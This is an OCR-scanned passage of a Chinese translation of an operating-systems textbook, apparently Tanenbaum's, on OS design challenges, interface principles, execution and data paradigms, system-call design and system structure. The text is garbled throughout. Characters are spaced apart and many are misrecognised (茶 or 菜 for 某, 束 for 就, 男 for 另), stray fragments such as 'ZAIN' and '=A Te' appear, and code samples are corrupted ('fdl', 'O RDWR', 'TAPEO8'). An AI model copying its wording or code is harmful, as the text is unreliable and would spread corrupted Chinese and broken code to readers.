多 。 苋 争 条 件 和 死 锁 只 是 出 现 的 问题 中 的 两 个 。 








第 三 ， 操 作 系统 必须 
户 或 者 做 不 允许 做 的 事情 例如 偷 鳃 为 一 个 用 户 的 文件 ) 的 用 户 。 操 作 
系统 需要 采取 措施 阻止 这 些 用 户 不 正当 的 行为 ， 而 字 处 理 程序 和 照片 编 
辑 程序 束 不 存在 这 样 的 问题 。 











ZAIN 





第 四 ， 尽 管事 实 上 并 非 所 有 的 用 尸 都 相信 其 他 用 户 ， 但 是 许多 用 户 
确实 希望 与 经 过 选择 的 其 他 用 户 共 享 他 们 的 信息 和 资源 。 操 作 系 统 必须 
使 其 成 为 可 能 ， 但 是 要 以 确保 怀 有 恶意 的 用 户 不 能 妨害 的 方式 。 而 应 用 
程序 就 不 会 面 对 关 似 这 样 的 挑战 。 





第 五 ， 操 作 系 统 已 经 问世 很 长 时 间 了 。UNIX 已 经 历 了 四 分 之 一 个 
世纪 ，Windows 面 世 也 已 经 超过 二 十 年 并 且 还 没有 消退 的 迹象 。 因 此 ， 
设计 人 员 必 须 思考 硬件 和 应 用 程序 在 遥远 的 未 来 可 能 会 发 生 的 变化 ， 并 
且 考 虑 为 这 样 的 变化 做 怎样 的 准备 。 紧 密 地 局 限于 世界 的 一 个 特定 视野 
的 系统 通常 不 会 存世 太 久 。 


第 六 ， 操 作 系 统 设 计 人 员 对 于 他 们 的 系统 将 怎样 被 人 使 用 实际 上 并 
没有 确切 的 概念 ， 所 以 他 们 需要 提供 相当 程度 的 通用 性 。UNIX 和 
Windows 在 设计 时 都 没有 把 电子 邮件 或 Web 浏 览 如 放 在 心 上 ， 然 而 许多 
运行 这 些 系统 的 计算 机 却 很 少 做 其 他 的 事情 。 人 们 在 告诉 一 名 轮船 设计 
师 建造 一 艘 轮船 时 ， 却 会 指明 他 想 要 的 是 渔船 、 游 船 还 是 战舰 ， 并 且 当 
产品 生产 出 来 之 后 鲜 有 人 会 改变 产品 的 用 途 。 





第 七 ， 现 代 操 作 系 统一 般 被 设计 成 可 移植 的 ， 这 意味 着 它们 必须 运 
行 在 多 个 硬件 平台 上 。 它 们 还 必须 支持 上 干 个 WO 设备 ， 所 有 这 些 WO 设 
备 都 是 独立 设计 的 ， 彼 此 之 间 没 有 关系 。 这 样 的 差异 可 能 会 导致 问题 ， 
一 个 例子 是 操作 系统 需要 运行 在 小 端 机 器 和 大 端 机 器 上 。 第 二 个 例子 经 
常 在 MS-DOS 下 看 到 ， 用 户 试图 安装 一 块 声卡 和 一 个 调制 解 调 器 ， 而 它 
们 使 用 了 相同 的 VO 端口 或 者 中 断 请 求 线 。 除 了 操作 系统 以 外 ， 很 少 有 
程序 必须 处 理由 于 硬件 部 件 冲 突 而 导致 的 这 类 问题 。 





第 八 ， 也 是 最 后 一 个 问题 ， 是 经 常 需要 与 菜 个 从 前 的 操作 系统 保持 
向 后 兼容 。 以 前 的 那个 系统 可 能 在 字 长 、 文 件 名 或 者 其 他 方面 有 所 限 
制 ， 而 在 设计 人 员 现 在 看 来 这 些 限制 都 是 过 时 的 ， 但 是 却 必须 坚持 。 这 
就 像 让 一 家 工厂 转 而 去 生产 下 一 年 的 汽车 而 不 是 这 一 年 的 汽车 的 同时 ， 
继续 全 力 地 去 生产 这 一 年 的 汽车 。 





13.2 ”接口 设计 


到 现在 读者 应 该 清楚 ， 编 写 一 个 现代 操作 系统 并 不 容易 。 但 是 人 们 
要 从 何 处 开始 呢 ? 可 能 最 好 的 起 点 是 考虑 操作 系统 提供 的 接口 。 操 作 系 
统 提供 了 一 组 抽象 ， 主 要 是 数据 类 型 〈 例 如 文件 ) 以 及 其 上 的 操作 《〈 例 
如 read) 。 它 们 合 起 来 形成 了 对 用 户 的 接口 。 注 意 ， 在 这 一 上 下 文中 操 
作 系 统 的 用 户 是 指 编写 使 用 系统 调用 的 代码 的 程序 员 ， 而 不 是 运行 应 用 
程序 的 人 员 。 











除了 主要 的 系统 调用 接口 ， 大 多 数 操作 系统 还 具有 另外 的 接口 。 例 
如 ， 茶 些 程序 员 需 要 编写 插入 到 操作 系统 中 的 设备 驱动 程序 。 这 些 驱动 
程序 可 以 看 到 操作 系统 的 某 些 功能 特性 并 且 能 够 发 出 茶 些 过 程 调用 。 这 
些 功 能 特性 和 调用 也 定义 了 接口 ， 但 是 与 应 用 程序 员 看 到 的 接口 完全 不 
同 。 如 果 一 个 系统 要 取得 成 功 ， 所 有 这 些 接口 都 必须 仔细 地 设计 。 





13.2.1 指导 原则 


有 没有 指导 接口 设计 的 原则 ? 我 们 认为 是 有 的 。 简 而 言 之 ， 原 则 区 
是 简单 、 完 备 和 能 够 有 效 地 实现 。 


原则 1: 简单 





一 个 简单 的 接口 更 加 易于 理解 并 且 更 加 易于 以 无 差错 的 方式 实现 。 
所 有 的 系统 设计 人 员 都 应 该 牢记 法 国 先驱 飞行 家 和 作家 Antoine de 
St.Exupéry 的 著名 格言 : 


不 是 当 没有 东西 可 以 再 添 如， 而 是 当 没有 东西 可 以 再 裁减 时 ， 才 能 
达到 尽善尽美 。 


一 原则 说 的 是 少 比 多 好 ， 至 少 在 操作 系统 本 号 中 是 这 样 。 这 一 原 
则 的 另 一 种 说 法 是 KISS 原 则 :， Keep It Simple,Stupid〈 保 持 简 朴 无 华 ) 


原则 2 完备 


当然 ， 接 口 必 须 能 够 做 用 户 需 要 做 的 一 切 事情 ， 也 束 是 说 ， 它 必须 
是 完备 的 。 这 使 我 们 想起 了 男 一 条 著名 的 格言 ，Albert Einstein 《阿尔 伯 
特 ' 爱 因 斯 坦 ) 说 过 : 


万 事 都 应 该 尽 可 能 简单 ， 但 是 不 能 过 于 简单 。 


换言之 ， 操 作 系 统 应 该 不 多 不 少 准 确 地 做 它 需 要 做 的 事情 。 如 果 用 
户 需 要 存储 数据 ， 它 就 必须 提供 存储 数据 的 机 制 ， 如 果 用 户 需 要 与 其 他 
用 户 通 信 ， 操 作 系 统 就 必须 提供 通信 机 制 ， 如 此 每 等 。1991 年 ，CTSS 
和 MULTICS 的 设计 者 之 一 Femando Corbat6 在 他 的 图 灵 奖 演说 中 ， 将 简 
单 和 完备 的 概念 结合 起 来 并 且 指 出 : 


首先 ， 重 要 的 是 强调 简单 和 精练 的 价值 ， 因 为 复杂 容易 导致 增加 


难 并 且 产 生 错 误 ， 正 如 我 们 已 经 看 到 的 那样 。 我 对 精练 的 定义 是 以 机 制 


的 最 少 化 和 清晰 度 的 最 大 化 实现 指定 的 功能 。 


此 处 重要 的 思想 是 机 制 的 最 少 化 (minimum of mechanism) 。 换 言 
之 ， 每 一 个 特性 、 功 能 和 系统 调用 都 应 该 尽 自 己 的 本 分 。 它 应 该 做 一 件 
事情 并 且 把 它 做 好 。 当 设计 小 组 的 一 名 成 员 提 议 扩充 一 个 系统 调用 或 者 
添加 某 些 新 的 特性 时 ， 其 他 成 员 应 该 问 这 样 的 问题 : “如 果 我 们 省 去 它 
会 不 会 发 生 可 怕 的 事情 ? ”如 果 回 答 是 : “不 会 ， 但 是 有 人 可 能 会 在 某 一 
天 发 现 这 一 特性 十 分 有 用 ”， 那 么 请 将 其 放 在 用 户 级 的 库 中 ， 而 不 是 操 
作 系 统 中 ， 尽 管 这 样 做 可 能 会 使 速度 慢 一 些 。 并 不 是 所 有 的 特性 都 要 比 
高 速 飞行 的 子弹 还 要 快 。 目 标 是 保持 Corbat6 所 说 的 机 制 的 最 少 化 。 











让 读者 简略 地 看 一 看 我 杀身 经 历 的 两 个 例子 ， MINIX (Tanenbaum 
和 Woodhull，2006) 和 Amoeba (Tanenbaum 等 人 ，1990) 。 实 际 上 ， 
MINIX 具 有 三 个 系统 调用 : send、receive 和 sendrec。 系 统 是 作为 一 组 进 
程 的 集合 而 构造 的 ， 内 存 管理 、 文 件 系 统 以 及 每 个 设备 驱动 程序 都 是 单 
独 的 可 调度 的 进程 。 作 为 首要 的 近似 ， 内 核 所 做 的 全 部 工作 只 是 调度 进 
程 以 及 处 理 在 进程 之 间 传 递 的 消息 。 因 此 ， 只 需要 两 个 系统 调用 : send 
发 送 一 条 消息 ， 而 receive 接 收 一 条 消息 。 第 三 个 调用 sendrec 只 是 为 了 效 
率 的 原因 而 做 的 优化 ， 它 使 得 仅 用 一 次 内 核 陷阱 就 可 以 发 送 一 条 消息 并 
且 请 求 应 答 。 其 他 的 一 切 事情 都 是 通过 请 求 某 些 其 他 进程 〈 例 如 文件 系 
统 进程 或 磁盘 驱动 程序 ) 做 相应 的 工作 而 完成 的 。 














Amoeba 甚 至 更 加 简单 。 它 仅 有 一 个 系统 调用 : 执行 远程 过 程 调 
用 。 该 调用 发 送 一 条 消息 并 且 等 待 一 个 应 答 。 它 在 本 质 上 与 MINIX 的 
sendrec 相 同 。 其 他 的 一 切 都 建立 在 这 一 调用 的 基础 上 。 








第 三 个 指导 方针 是 实现 的 效率 。 如 果 一 个 功能 特性 或 者 系统 调用 不 
能 够 有 效 地 实现 ， 或 许 就 不 值得 包含 它 。 对 于 程序 员 来 说 ， 一 个 系统 调 
用 的 代价 有 多 大 也 应 该 在 直 党 上 是 显而易见 的 。 例 如 ，UNIX 程 序 员 会 
认为 lseek 系 统 调用 比 read 系 统 调用 要 代价 低廉 ， 因 为 前 者 只 是 在 内 存 中 
修改 一 个 指针 ， 而 后 者 则 要 执行 磁盘 IO。 如 果 直 党 的 代价 是 错误 的 ， 
程序 员 就 会 写 出 效率 差 的 程序 。 











13.2.2 mE 








一 旦 确定 了 目标 ， 就 可 以 开始 设计 了 。 一 个 良好 的 起 点 是 考虑 客户 
将 怎样 审视 该 系统 。 最 为 重要 的 问题 之 一 是 如 何 将 系统 的 所 有 功能 特性 
民 好 地 结合 在 一 起 ， 并 且 展 现 出 经 常 所 说 的 体系 结构 一 致 性 
(architectural coherence) 。 在 这 方面 ， 重 要 的 是 区 分 两 种 类 型 的 操作 
系统 “客户 ”。 一 方面 ， 是 用 户 ， 他 们 与 应 用 程序 打交道 ， 男 一 方面 ， 是 
程序 员 ， 他 们 编写 应 用 程序 。 前 者 主要 涉及 GUI， 后 者 主要 涉及 系统 调 
用 接口 。 如 果 打 算 拥 有 人 过 及 整个 系统 的 早 一 GUI， 就 像 在 Macintosh 中 那 
样 ， 设 计 应 该 在 此 处 开始 。 然 而 ， 如 果 打 算 文 持 许多 可 能 的 GUI， 束 像 
在 UNIX 中 那样 ， 那 么 束 应 该 首先 设计 系统 调用 接口 。 首 先 设计 GUI 本 
质 上 是 自 项 疝 下 的 设计 。 这 时 的 问题 是 GUI 要 拥有 什么 功能 特性 ， 用 户 
将 怎样 与 它 打 交道 ， 以 及 为 了 文 持 它 应 该 怎样 设计 系统 。 例 如 ， 如 条 大 
多 数 程序 在 屏幕 上 显示 图 标 然 后 等 竺 用户 在 其 上 点 击 ， 这 蜡 示 独 GUIY 
该 采用 事件 驱动 模型 ， 并 且 操 作 系 统 或 许 也 应 该 采用 事件 驱动 模型 。 力 
一 方面 ， 如 果 屏 幕 主要 被 文本 窗口 占据 ， 那 么 进程 从 键盘 读 取 输 入 的 模 
型 可 能 会 更 好 。 



































首先 设计 系统 调用 接口 是 自 底 向 上 的 设计 。 此 时 的 问题 是 程序 员 通 
常 需要 哪些 种 类 的 功能 特性 。 实 际 上 ， 并 不 是 需要 许多 特别 的 功能 特性 
才能 支持 一 个 GUI。 例 如 ，UNIX 窗 口 系统 X 只 是 一 个 读 写 键盘 、 鼠 标 和 





屏幕 的 大 的 C 程 序 。X 是 在 UNIX 问 世 很 久 以 后 才 开 发 的 ， 但 是 并 不 要 求 
对 操作 系统 做 很 多 修改 就 可 以 使 它 工作 。 这 一 经 历 验 证 了 这 样 的 事实 : 
UNIX 是 十 分 完备 的 。 





1. 用 户 界面 范 型 





对 于 GUI 级 的 接口 和 系统 调用 接口 而 言 ， 最 重要 的 方面 是 有 一 个 良 
好 的 范 型 《有 时 称 为 隐喻 ) ， 以 提供 观察 接口 的 方法 。 台 式 计算 机 的 许 
多 GUI 使 用 我 们 在 第 5 章 讨论 过 的 WIMP 范 型 。 该 范 型 在 遍及 接口 的 各 处 
使 用 定点 -点 击 、 定 点 -双击 、 拖 动 以 及 其 他 术语 ， 以 提供 总 体 上 的 体系 
结构 一 致 性 。 对 于 应 用 程序 常常 还 有 额外 的 要 求 ， 例 如 要 有 一 个 具有 文 
件 (FILE) 、 编 辑 CEDIT) 以 及 其 他 条 目的 荣 单 栏 ， 每 个 条 目 具 有 某 
些 众所周知 的 菜单 项 。 这 样 ， 熟 悉 一 个 程序 的 用 户 就 能 够 很 快 地 学 会 另 
=A Te 























然而 ，WIMP 用 户 界 面 并 不 是 惟一 可 能 的 用 户 界 面 。 某 些 掌 上 型 计 
算 机 使 用 一 种 程式 化 的 手写 界面 。 专 用 的 多 媒体 设备 可 能 使 用 像 VCR 一 
样 的 界面 。 当 然 ， 语 音 输入 具有 完全 不 同 的 范 型 。 重 要 的 不 是 选择 这 人 么 
多 的 范 型 ， 而 是 存在 一 个 单一 的 统领 一 切 的 范 型 统一 整个 用 户 界 面 。 





不 管 选择 什么 范 型 ， 重 要 的 是 所 有 应 用 程序 都 要 使 用 它 。 因 此 ， 系 
统 设计 者 需要 提供 库 和 工具 包 给 应 用 程序 开发 人 员 ， 使 他 们 能 够 访问 产 
生 一 致 的 外 观 与 感觉 的 过 程 。 用 户 界 面 设计 非常 重要 ,但 它 并 不 是 本 书 





的 主题 ， 所 以 我 们 现在 要 退回 到 操作 系统 接口 的 主题 上 。 


2. 执 行 范 型 





体系 结构 一 致 性 不 但 在 用 户 层面 是 重要 的 ， 在 系统 调用 接口 层面 也 
同样 重要 。 在 这 里 区 分 执行 范 型 和 数据 范 型 常常 证 有 葡 的 ， 所 以 我 们 将 
讨论 两 者 ， 我 们 以 前 者 为 开始 。 





两 种 执行 范 型 被 广泛 接受 : 算法 范 型 和 事件 驱动 范 型 。 算 法 范 型 
(algorithmic paradigm) 基于 这 样 的 思想 : 局 动 一 个 程序 是 为 了 执行 某 
个 功能 ， 而 该 功能 是 事先 知道 的 或 者 是 从 其 参数 获知 的 。 该 功能 可 能 是 
编译 一 个 程序 、 编 制 工资 册 ， 或 者 是 将 一 架 飞 机 飞 到 旧金山 。 基 本 馆 辑 
被 便 接 线 到 代码 当中 ， 而 程序 则 时 御 发 出 系统 调用 获取 用 户 输入 、 获 得 
操作 系统 服务 等 。 图 13-1a 中 概括 了 这 一 方法 。 





main( ) main( ) 
{ 


Mee mess_t msg; 


init( ); init( ); 
do_something( ); while (get_message(&msg)) { 
read(...); switch (msg.type) { 


do_something_else( ); case 1:...; 
write(...); case 2: ...; 
keep_going( ); case 3:...; 
exit(0); 





图 13-1 人 算法 代码 ; b) 事 件 驱动 代码 





另 一 种 执行 范 型 是 图 13-1b 所 示 的 事件 驱动 范 型 Cevent-driven 
paradigm) 。 在 这 里 程序 执行 荣 种 初始 化 〈 例 如 通过 显示 茶 个 屏幕 ) 
然后 等 竺 操作 系统 告诉 它 第 一 个 事件 。 事 件 经 党 是 键 和 页 融 击 或 鼠标 移 
动 。 这 一 设计 对 于 高 度 交 互 式 的 程序 是 十 分 有 益 的 。 








这 些 做 事情 的 每 一 种 方法 造 束 了 其 特有 的 程序 设计 风格 。 在 算法 范 
型 中 ， 算 法 位 居中 心 而 操作 系统 被 看 作 是 服务 提供 者 。 在 事件 驱动 范 型 
中 ， 操 作 系 统 同样 提供 服务 ， 但 是 这 一 角色 与 作为 用 户 行为 的 协调 者 和 
被 进程 处 理 的 事件 的 生产 者 相 比 束 没 那么 重要 了 。 








3. 数 据 范 型 


执行 范 型 并 不 是 操作 系统 导出 的 惟一 范 型 ， 同 等 重要 的 范 型 是 数据 
范 型 。 这 里 关键 的 问题 是 系统 结构 和 设备 如 何 展现 给 程序 员 。 在 早期 的 
FORTRAN 批 处 理 系统 中 ， 所 有 一 切 都 是 作为 连续 的 磁带 而 建立 模型 。 
用 于 读 入 的 卡片 组 被 看 作 和 输入 磁带 ， 用 于 穿孔 的 卡片 组 被 看 作 输 出 磁 
带 ， 并 且 打 印 机 输出 被 看 作 输出 磁带 。 磁 盘 文件 也 被 看 作 磁 带 。 对 一 个 
文件 的 随机 访问 是 可 能 的 ， 只 要 将 磁带 倒 带 到 对 应 的 文件 并 且 再 次 读 取 
就 可 以 了 。 








使 用 作业 控制 卡片 可 以 这 样 来 实现 映射 : 





MOUNT (TAPEO8,REEL781) 
RUN (INPUT, MYDATA, OUTPUT, PUNCH, TAPEO8) 























第 一 张 卡片 指示 操作 员 去 从 磁带 架 上 取得 磁带 卷 7281， 并 且 将 其 安 
装 在 磁带 驱动 器 8 上 。 第 二 张 卡片 指示 操作 系统 运行 刚刚 编译 的 
FORTRAN 程 序 ， 映 射 INPUT《〈 意 指 卡片 阅读 机 ) BREET, BRON Tee 
盘 文 件 MYDATA 到 逻辑 磁带 2， 上 映射 打 印 机 《 称 为 OUTPUT) 到 逻辑 磁 
带 3， 了 映射 卡片 穿孔 机 〈 称 为 PUNCH) 到 逻辑 磁带 4， 并 且 映 射 物理 磁 
带 驱动 器 8 到 逻辑 磁带 5。 





FORTRAN 具 有 读 写 逻辑 磁带 的 语法 。 通 过 读 逻 辑 磁 带 1， 程 序 获得 
卡 卢 输入 。 通 过 写 逻 辑 磁带 3， 输 出 随后 将 会 出 现在 打印 机 上 。 通 过 读 
逻辑 磁带 5， 磁 带 卷 781 将 被 读 入 ， 如 此 每 等 。 注 意 ， 人 磁带 概念 只 是 集成 
卡片 阅读 机 、 打 印 机 、 穿 孔 机 、 磁 盘 文 件 以 及 磁带 的 一 个 范 型 。 在 这 个 
例子 中 ， 只 有 逻辑 磁带 5 是 一 个 物理 磁带 ， 其 余 的 都 是 普通 的 〔( 假 脱 
机 ) 磁盘 文件 。 这 只 是 一 个 原始 的 范 型 ， 但 它 却 是 正确 方向 上 的 一 个 开 

后 来 ，UNIX 问 世 了 ， 它 采用 “所 有 一 切 都 是 文件 ”的 模型 进一步 发 


展 了 这 一 思想 。 使 用 这 一 范 型 ， 所 有 IO 设备 都 被 看 作 是 文件 ， 并 且 可 
以 像 普通 文件 一 样 打开 和 操作 。C 语 句 








fdl=open ("filel",O RDWR) ; 
fd2=open ("/dev/tty",O RDWR) ; 














打开 一 个 真正 的 磁盘 文件 和 用 户 终端 。 随 后 的 语句 可 以 使 用 fd1 和 
fd2 分 别 读 写 它们 。 从 这 一 时 刻 起 ， 在 访问 文件 和 访问 终端 之 间 并 不 存 
在 差异 ， 只 不 过 在 终端 上 寻 道 是 不 允许 的 。 


UNIX 不 但 统一 了 文件 和 IO 设备 ， 它 还 允许 像 访 问 文件 一 样 通过 管 
道 访问 其 他 进程 。 此 外 ， 妆 支持 映射 文件 时 ， 一 个 进程 可 以 得 到 其 自 号 
的 虚拟 内 存 ， 就 像 它 是 一 个 文件 一 样 。 最 后 ， 在 文 持 /proc 文 件 系 统 的 
UNIX 版 本 中 ，C 语 句 





fd3=open ("/proc/501",0 RDWR); 








允许 进程 (尝试 ) 访问 进程 501 的 内 存 ， 使 用 文件 描述 符 fd3 进 行 读 
和 写 ， 这 在 某 种 程度 上 是 有 益 的 ， 例 如 对 于 一 个 调试 絮 。 





Windows Vista 更 进一步 ， 它 试图 使 所 有 一 切 看 起 来 像 是 一 个 对 象 。 
一 旦 一 个 进程 获得 了 一 个 指向 文件 、 进 程 、 信 号 量 、 邮 箱 或 者 其 他 内 核 
对 象 的 有 效 句柄 ， 它 就 可 以 在 其 上 执行 操作 。 这 一 范 型 甚至 比 UNIX 更 
加 一 般 化 ， 并 且 比 FORTRAN 要 一 般 化 得 多 。 





统一 的 范 型 还 出 现在 其 他 上 下 文中 ， 其 中 在 这 里 值得 一 提 的 是 
Web。Web 背 后 的 范 型 是 充满 了 文档 的 超 空间 ， 每 一 个 文档 具有 一 个 
URL。 通 过 键入 一 个 URL 或 者 点 击 被 URL 所 文 持 的 条 目 ， 你 就 可 以 得 到 
该 文档 。 实 际 上 ， 许 多 “文档 ”根本 就 不 是 文档 ， 而 是 当 请 求 到 来 时 由 程 











序 或 者 命令 行 解 释 器 脚本 生成 的 。 例 如 ， 当 用 户 询问 一 家 网 上 商店 关于 
一 位 特定 艺术 家 的 CD 清单 时 ， 文 档 由 一 个 程序 即时 生成 ; 在 查询 未 做 
出 之 前 该 文档 的 确 并 不 存在 。 





至 此 我 们 已 经 看 到 了 4 种 事例 ， 即 所 有 一 切 都 是 磁带 、 文 件 、 对 象 
或 者 文档 。 在 所 有 这 4 种 事例 中 ， 意 图 是 统一 数据 、 设 备 和 其 他 资源 ， 
从 而 使 它们 更 加 易于 处 理 。 每 一 个 操作 系统 都 应 该 具有 这 样 的 统一 数据 


范 型 。 








13.23 ”系统 调用 接口 


如 果 一 个 人 相信 Corbat6 的 机 制 最 少 化 的 格言 ， 那 么 操作 系统 应 该 
提供 恰好 够 用 的 系统 调用 ， 并 且 每 个 系统 调用 都 应 该 尽 可 能 简单 〈 但 不 
能 过 于 简单 ) 。 统 一 的 数据 范 型 在 此 处 可 以 扮演 重要 的 角色 。 例 如 ， 如 
果 文 件 、 进 程 、IO 设 备 以 及 更 多 的 东西 都 可 以 看 作 是 文件 或 者 对 象 ， 
那么 它们 就 都 能 够 用 单一 的 read 系 统 调用 来 读 取 。 人 否则 ， 可 能 就 有 必要 
具有 read_file、read_proc 以 及 read_tty 等 单独 的 系统 调用 。 








在 某 些 情况 下 ， 系 统 调用 可 能 看 起 来 需要 奋 干 变 体 ， 但 是 通常 更 好 
的 实现 是 具有 处 理 一 般 情 况 的 一 个 系统 调用 ， 而 由 不 同 的 库 过 程 同 程序 
员 隐 藏 这 一 事实 。 例 如 ，UNIX 具 有 一 个 系统 调用 exec， 用 来 禾 兰 一 个 
进程 的 虚拟 地 址 空间 。 最 一 般 的 调用 是 : 





exec (name, argp, envp); 





该 调用 加 载 可 执行 文件 name， 并 且 给 它 提供 由 argp 所 指 癌 的 参数 和 
envp 所 指向 的 环境 变量 。 有 时 明确 地 列 出 参数 是 十 分 方便 的 ， 所 以 库 中 
包含 如 下 调用 的 过 程 : 


execl (name,arg0,argl,...,argn,0); 
execle (name,arg0,argl,...,argn,envp); 











所 有 这 些 过 程 所 做 的 事情 是 将 参数 粘连 在 一 个 数组 中 ， 然 后 调用 
exec 来 做 工作 。 这 一 安排 达到 了 双 启 目的 : 单一 的 直接 系统 调用 使 操作 
系统 保持 简单 ， 而 程序 员 得 到 了 以 各 种 方法 调用 exec 的 便利 。 





当然 ， 试 图 拥有 一 个 调用 来 处 理 每 一 种 可 能 的 情况 很 可 能 难以 控 
制 。 在 UNIX 中 ， 创 建 一 个 进程 需要 两 个 调用 : fork 然 后 是 exec， 前 者 不 
需要 参数 ， 后 者 具有 3 个 参数 。 相 反 ， 创 建 一 个 进程 的 win32 API 调 用 
CreateProcess 具 有 10 个 参数 ， 其 中 一 个 参数 是 指向 一 个 结构 的 指针 ， 该 


结构 具有 为 外 18 个 参数 。 





很 久 以 前 ， 有 人 曾经 问 过 这 样 的 问题 :“ 如 果 我 们 省 略 了 这 些 东西 
会 不 会 发 生 可 怕 的 事情 ? ?诚实 的 回答 应 该 是 :“ 在 菜 些 情况 下 程序 员 可 
能 不 得 不 做 更 多 的 工作 以 达到 特定 的 效果 ， 但 是 最 终 的 结果 将 会 是 一 个 
更 人 简单、 更 小 巧 并 且 更 可 靠 的 操作 系统 。” 当 然 ， 主 张 10+18 个 参数 版 本 
的 人 可 能 会 说 : “但 是 用 户 喜 欢 所 有 这 些 特 性 。” 对 此 的 反驳 可 能 会 
征 :“ 他 们 更 加 喜欢 使 用 很 少 内 存 并 且 从 来 不 会 月 省 的 系统 。” 在 更 多 功 
能 性 和 更 多 内 存 代价 之 间 的 权衡 是 显而易见 的 ， 并 且 可 以 从 价格 上 来 衡 
量 ( 因 为 内 存 的 价格 是 已 知 的 ) 。 然 而 ， 每 年 由 于 茶 些 特性 而 增加 的 崩 
沉 次 数 是 难于 估算 的 ， 并 且 如 果 用 户 知 道 了 隐藏 的 代价 是 否 还 会 做 出 同 
样 的 选择 呢 ? 这 一 影响 可 以 在 Tanenbaum 软 件 第 一 定律 中 做 出 总 结 : 




















添加 更 多 的 代码 就 是 添加 更 多 的 程序 错误 。 


添加 更 多 的 功能 特性 束 要 添加 更 多 的 代码 ， 因 此 就 要 添加 更 多 的 程 
序 错 误 。 相 信 添 加 新 的 功能 特性 而 不 会 添加 新 的 程序 错误 的 程 友 员 要 么 
征 计算 机 的 生 手 ， 要 么 就 是 相信 牙齿 仙女 《据说 会 在 儿童 掉 落 在 枕 边 的 
幼 齿 劳 放 上 钱财 的 仙女 ) 正在 那里 监视 着 他 们 。 








简单 不 是 设计 系统 调用 时 出 现 的 惟一 问题 。 一 个 重要 的 考虑 因素 是 
Lampson (1984) 的 口号 : 


不 要 隐藏 能 力 


如 采 人 硬件 具 有 极其 高 效 的 方法 做 共事 ， 它 就 应 该 以 简单 的 方法 展露 
给 程序 员 ， 而 不 应 该 掩埋 在 某 些 其 他 抽象 的 内 部 。 抽 象 的 目的 是 隐藏 不 
合 需 要 的 特性 ， 而 不 是 隐藏 值得 需要 的 特性 。 例 如 ， 假 设 硬件 具有 一 种 
特殊 的 方法 以 很 高 的 速度 在 屏幕 上 《也 就 是 视频 RAM 中 ) 移动 大 型 位 
图 ， 正 确 的 做 法 是 要 有 一 个 新 的 系统 调用 能 够 得 到 这 一 机 制 ， 而 不 是 只 
提供 一 种 方法 将 视频 RAM 读 到 内 存 中 并 且 再 将 其 写 回 。 新 的 系统 调用 
Y 该 只 是 移动 位 而 不 做 其 他 事情 。 如 果 系 统 调用 速度 很 快 ， 用 户 总 可 以 
在 其 上 建立 起 更 加 方便 的 接口 。 如 果 它 的 速度 慢 ， 没 有 人 会 使 用 它 。 























另 一 个 设计 问题 是 面向 连接 的 调用 与 无 连接 的 调用 。 读 文件 的 标准 
UNIX 系 统 调用 和 Win32 系 统 调用 是 面向 连接 的 。 首 先 你 要 打开 一 个 文 
件 ， 然 后 读 它 ， 最 后 关闭 它 。 某 些 远 程 文件 访问 协议 也 是 面向 连接 的 。 
例如 ， 要 使 用 FTP， 用 户 首先 要 登录 到 远程 计算 机 上 ， 读 文件 ， 然 后 注 








销 。 


男 一 方面 ， 某 些 远程 文件 访问 协议 是 无 连接 的 ， 例 如 Web 协 议 
(HTTP〉。 要 读 一 个 Web 页 面 你 只 要 请 求 它 就 可 以 了 ; 不 存在 事先 建 

连接 的 需要 (TCP 连接 是 需要 的 ， 但 是 这 处 于 协议 的 低层 访问 Web 
本 和 喘 的 HTTP 协 议 是 无 连接 的 )。 





任何 面向 连接 的 机 制 与 无 连接 的 机 制 之 间 的 权衡 在 于 建立 连接 的 机 
制 〈《 例 如 打开 文件 ) 要求 的 额外 开销 ， 以 及 在 后 续 调 用 (可 能 很 多 ) 中 
避免 进行 连接 所 市 来 的 好 处 。 对 于 单机 上 的 文件 WO 而 言 ， 由 于 建立 连 
接 的 代价 很 低 ， 标 准 的 方法 (首先 打开 ， 然 后 使 用 〉 可 能 是 最 好 的 方 
法 。 对 于 远程 文件 系统 而 言 ， 两 种 方法 都 可 以 采用 。 








与 系统 调用 接口 有 关 的 另 一 个 问题 是 接口 的 可 见 性 。POSIX 强 制 的 
系统 调用 列表 很 容易 找到 。 所 有 UNIX 系 统 都 支持 这 些 系 统 调用 ， 以 及 
少数 其 他 系统 调用 ， 但 是 完全 的 列表 总 是 公开 的 。 相 反 ，Microsoft 从 未 
Windows Vista 系 统 调 用 列表 公开 。 作 为 蔡 代 ，Win32 API 和 其 他 API 
被 公开 了 ， 但 是 这 些 API 包 含 大 量 的 库 调 用 《超过 10 000 个 ) ， 只 有 很 
少数 是 真正 的 系统 调用 。 将 所 有 系统 调用 公开 的 论据 是 可 以 让 程序 员 知 
道 什么 是 代价 低廉 的 (在 用 户 空间 执行 的 函数 ) ， 什 么 是 代价 昂贵 的 
(内 核 调 用 ) 。 不 将 它们 公开 的 论据 是 这 样 给 实现 提供 了 灵活 性 ， 无 须 
破坏 用 户 程序 就 可 以 修改 实际 的 底层 系统 调用 ， 以 便 使 其 工作 得 更 好 。 





13.3 ”实现 


看 过 用 户 界面 和 系统 调用 接口 后 ， 现 在 让 我 们 来 看 一 看 如 何 实现 一 
个 操作 系统 。 在 下 面 8 个 小 节 ， 我 们 将 分 析 涉 及 实现 策略 的 茶 些 一 般 的 
概念 性 问题 。 在 此 之 后 ， 我 们 将 看 一 看 东 些 低层 技术 ， 这 些 技术 通 闻 是 
十 分 有 益 的 。 


13.3.1 系统 结构 


实现 必须 要 做 出 的 第 一 个 决策 可 能 是 系统 结构 应 该 是 什么 。 我 们 在 
1.7 节 分 析 了 主要 的 可 能 性 ， 在 这 里 要 重 温 一 下 。 一 个 无 结构 的 单 块 式 
设计 实际 上 并 不 是 一 个 好 主意 ， 除 非 可 能 是 用 于 电 冰 箱 中 的 微小 的 操作 
系统 ， 但 是 即使 在 这 里 也 是 可 争论 的 。 


1. 分 层 系统 


多 年 以 来 很 好 地 建立 起 来 的 一 个 合理 的 方案 是 分 层 系统 。Dijkstra 
的 THE 系 统 ( 图 1-25) 是 第 一 个 分 层 操 作 系 统 。UNIX 和 Windows Vista 
也 具有 分 层 结构 ， 但 是 在 这 两 个 系统 中 分 层 更 是 一 种 试图 描述 系统 的 方 
法 ， 而 不 是 用 于 建立 系统 的 真正 的 指导 原则 。 





对 于 一 个 新 系统 ， 选 择 走 这 一 路 线 的 设计 人 员 应 该 首先 非常 仔细 地 


选择 各 个 层次 ， 并 且 定 义 每 个 层次 的 功能 。 确 层 应 该 总 是 试图 隐藏 硬件 
